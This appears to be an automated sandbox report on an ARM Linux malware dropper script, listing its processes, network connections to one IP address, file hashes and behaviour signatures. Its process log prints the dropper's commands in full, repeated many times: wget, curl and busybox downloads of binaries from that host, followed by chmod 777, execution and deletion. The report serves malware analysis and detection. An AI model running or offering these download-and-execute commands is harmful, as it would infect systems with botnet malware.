[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/chmod
[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V
[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/rm
[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/wget
[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/chmod
[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS
[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/rm
[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:26
Reported
2024-10-25 01:29
Platform
debian9-armhf-20240611-en
Max time kernel
29s
Max time network
45s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
Processes
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/chmod
[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH
[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/rm
[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/chmod
[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal
[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/rm
[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/wget
[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/chmod
[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V
[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/rm
[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/wget
[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/chmod
[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS
[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/rm
[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/rm
[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/chmod
[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8
[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/bin/rm
[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/wget
[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/chmod
[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj
[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/rm
[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/wget
[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/chmod
[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm
[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/bin/rm
[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]
/usr/bin/wget
[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/chmod
[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ
[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/bin/rm
[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]
/usr/bin/wget
[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/bin/chmod
[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv
